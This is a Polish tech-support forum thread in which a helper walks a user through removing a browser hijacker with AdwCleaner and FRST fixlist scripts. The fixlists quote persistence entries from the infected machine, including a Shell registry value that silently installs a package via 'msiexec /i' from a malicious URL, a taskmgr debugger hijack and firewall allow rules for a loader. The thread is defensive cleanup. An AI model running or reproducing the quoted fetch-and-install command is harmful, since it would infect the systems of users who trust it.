Luckystarting przejął przegladarki


(adamIII) #1

witam, logi z frst:
frst:
http://www.wklej.org/id/3103636/
addition:
http://www.wklej.org/id/3103638/
shortcut:
http://www.wklej.org/id/3103640/


(Atis) #2

W panelu sterowania odinstaluj AlphaGo i Browser-Security.

Pobierz i uruchom AdwCleaner Kliknij Skanuj (Scan) i później Oczyść (Clean).

Kliknij Skanuj (Scan) i pokaż nowy raport FRST i Addition.


(adamIII) #3

frst: http://www.wklej.org/id/3103750/
addition: http://www.wklej.org/id/3103751/


(Atis) #4

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: HKU\S-1-5-21-887313937-3397365559-1128996302-1001\...\Run: [background_fault] => C:\Users\ja\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA HKU\S-1-5-21-887313937-3397365559-1128996302-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRWq1OUUyRYIcRWLXNWZLMdQQFdI5OYZXM8JWFdH8RF== /q IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-887313937-3397365559-1128996302-1001\Software\Microsoft\Internet Explorer\Main,Start Page = Edge HomeButtonPage: HKU\S-1-5-21-887313937-3397365559-1128996302-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492593644&z=a0febc485133fce1163800agez6t9o8w0t1ccq8z0w&from=che0812&uid=ST1000LM014-SSHD-8GB_W380X8RFXXXXW380X8RF FF DefaultSearchEngine: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck FF SelectedSearchEngine: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck CHR StartupUrls: Default -> "hxxps://fantasy.premierleague.com/a/team/78553/event/34","hxxp://www.fplstatistics.co.uk/","hxxps://fpldiscovery.wordpress.com/category/regular-posts/gameweek-statistics/","hxxps://www.whoscored.com/Regions/252/Tournaments/2/England-Premier-League" CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492593644&z=a0febc485133fce1163800agez6t9o8w0t1ccq8z0w&from=che0812&uid=ST1000LM014-SSHD-8GB_W380X8RFXXXXW380X8RF&q={searchTerms} CHR DefaultSearchKeyword: Default -> ourluckysites CHR Extension: (Browser-Security) - C:\Users\ja\AppData\Local\Google\Chrome\User Data\Default\Extensions\faeinneekbeceimjnljfmaincojhhmln [2016-10-26] CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx R2 SNAREA; C:\Users\ja\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) S2 3DM; C:\Users\ja\AppData\Local\3DM\Kitty.dll [X] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [X] 2017-05-04 10:56 - 2017-05-04 10:56 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-05-04 10:55 - 2017-05-04 10:55 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-05-04 10:43 - 2017-05-04 10:51 - 00000000 ____D C:\AdwCleaner 2017-05-04 10:41 - 2017-05-04 10:42 - 00000000 ____D C:\Users\ja\AppData\Local\background_fault 2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Users\Public\Documents\Google 2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Users\ja\AppData\Local\Dayglad 2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Program Files (x86)\IIS 2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Program Files (x86)\Dayglad 2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 ____D C:\WINDOWS\psgo 2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 ____D C:\Users\ja\AppData\Local\SNAREA 2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-03 20:39 - 2017-05-03 20:41 - 00000000 ____D C:\Program Files\MK 2017-05-02 18:56 - 2017-05-02 18:56 - 00000000 ____D C:\Program Files (x86)\MIO 2017-04-13 15:01 - 2017-03-08 12:03 - 00000000 ____D C:\Users\ja\AppData\Roaming\ScreenShot C:\Users\ja\AppData\Local\background_fault\aswRD.exe Task: {0647C3B1-DEEF-456F-8FB8-E4BEA612BAB0} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe Task: {45DF0865-7A1C-4481-A603-85419C762382} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-10-10] () Shortcut: C:\Users\ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) FirewallRules: [{60C3CD68-ADA8-442D-A6AA-DBFC11D1B1A1}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat FirewallRules: [{2D6EC592-08E9-4977-89A5-7FA885D3F54D}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat FirewallRules: [{713D1B58-A519-4121-A4DC-2812F8083F37}] => (Allow) C:\Program Files (x86)\Dayglad\Application\chrome.exe FirewallRules: [{2B8DD5E2-A39F-42CA-B5C2-F9242FBEA33B}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{C857B866-C6A7-47F2-B216-F7B99BFACB00}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{0872D2DD-B5DD-413F-9202-134DDB4CF206}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat FirewallRules: [{2FFB0798-947D-4871-BC66-6F3AB329AA4C}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(adamIII) #5

z fixlog: http://www.wklej.org/id/3103833/
frst: http://www.wklej.org/id/3103835/


(Atis) #6

Przywracanie ustawień domyślnych Chrome
W pasek adresu wpisz: about:support Kliknij Odśwież program Firefox.
Zainstaluj uBlock: Firefox - Chrome - Opera

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

S2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [X] 2017-05-04 13:13 - 2017-05-04 13:13 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-05-04 13:09 - 2017-02-09 00:29 - 00000000 ____D C:\Users\ja\AppData\LocalLow\Temp DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK
Odinstaluj Java 8 Update 121 i zainstaluj Java 8 Update 131
Włącz przywracanie dla dysku systemowego C:
https://www.tenforums.com/tutorials/4533-turn-off-system-protection-drives-windows-10-a.html